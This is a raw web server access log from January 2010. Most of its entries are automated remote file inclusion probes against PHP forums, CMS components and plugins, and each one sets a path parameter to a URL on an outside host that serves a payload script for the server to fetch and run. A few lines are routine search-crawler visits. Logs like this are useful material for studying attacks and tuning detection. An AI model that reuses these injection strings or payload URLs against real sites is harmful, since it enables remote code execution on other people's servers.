209.92.156.53 - - [04/Jan/2010:01:51:34 -0800] "GET /logs/access_091109.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:34 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:34 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:39 -0800] "GET /logs/access_091102.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:44 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:44 -0800] "GET /logs/access_091109.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:45 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:52 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:51:54 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:08 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:08 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:08 -0800] "GET /logs/access_091207.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:52:22 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:52:22 -0800] "GET /logs/access_091109.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:52:22 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:52:22 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:01:52:23 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:01:52:23 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:01:52:23 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:53 -0800] "GET /logs/access_090601.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:54 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:54 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:52:54 -0800] "GET /logs/access_091207.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:01:53:26 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [04/Jan/2010:01:53:38 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.myfiberhub.com/cafeforum/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [04/Jan/2010:01:53:38 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.myfiberhub.com/cafeforum/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.124.204 - - [04/Jan/2010:01:53:38 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.myfiberhub.com/cafeforum/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:01:53:59 -0800] "GET /logs/access_090601.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.chemsteel.co.kr/bbs//data/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:54:15 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:01:57:48 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:10 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:10 -0800] "GET /send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:10 -0800] "GET /logs/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:35 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:01:59:35 -0800] "GET /logs/access_091228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:46 -0800] "GET /send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:46 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:01:59:46 -0800] "GET /logs/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:04 -0800] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:04 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:04 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:02:00:05 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:00:11 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:02:00:33 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:42 -0800] "GET /logs/access_091123.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:42 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:00:42 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:28 -0800] "GET /myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:28 -0800] "GET /logs/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:28 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:33 -0800] "GET /logs/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:33 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:33 -0800] "GET /myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:01:37 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:02:02:06 -0800] "GET /logs/access.log%20%20/myevent.php?myevent_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:07 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:07 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:08 -0800] "GET /logs/access_091221.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:15 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:16 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:16 -0800] "GET /logs/access_091221.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:17 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:18 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:02:18 -0800] "GET /logs/access_091221.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:02:04:16 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:02:04:25 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:50 -0800] "GET /logs/access_091221.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:50 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:50 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:55 -0800] "GET /logs/access_091221.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:55 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:04:55 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:02:05:01 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:02:06:05 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:06:05 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:02:06:05 -0800] "GET /logs/access_091221.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
170.210.192.78 - - [04/Jan/2010:02:07:58 -0800] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:08:20 -0800] "GET /logs/access_091123.log////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [04/Jan/2010:02:08:41 -0800] "GET /logs/access_091123.log////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.13 - - [04/Jan/2010:02:09:05 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [04/Jan/2010:02:09:05 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.221.130.13 - - [04/Jan/2010:02:09:06 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.189.158.17 - - [04/Jan/2010:02:09:37 -0800] "GET /logs/access_090622.log HTTP/1.0" 200 1245184 "http://www.galf.org/logs/access_090622.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:15:30 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:15:30 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:15:30 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:02:15:48 -0800] "GET /logs/access_091228.log HTTP/1.0" 200 6435147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:16:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:16:26 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:16:26 -0800] "GET /logs//components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.170.89.6 - - [04/Jan/2010:02:16:26 -0800] "GET /logs/access_090706.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:17:02 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
87.250.252.242 - - [04/Jan/2010:02:17:21 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 5268694 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:02:18:56 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.55.15.194 - - [04/Jan/2010:02:23:24 -0800] "GET /logs/access_091123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=zeroo? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:31 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:31 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:31 -0800] "GET /logs/access_091207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:34 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:25:34 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:02:26:25 -0800] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:40:37 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:40:37 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:40:37 -0800] "GET /logs/access_091228.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:41:56 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:41:56 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:41:56 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:42:05 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:42:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:42:08 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:02:42:27 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:45:59 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:45:59 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:45:59 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:46:27 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:02:46:30 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
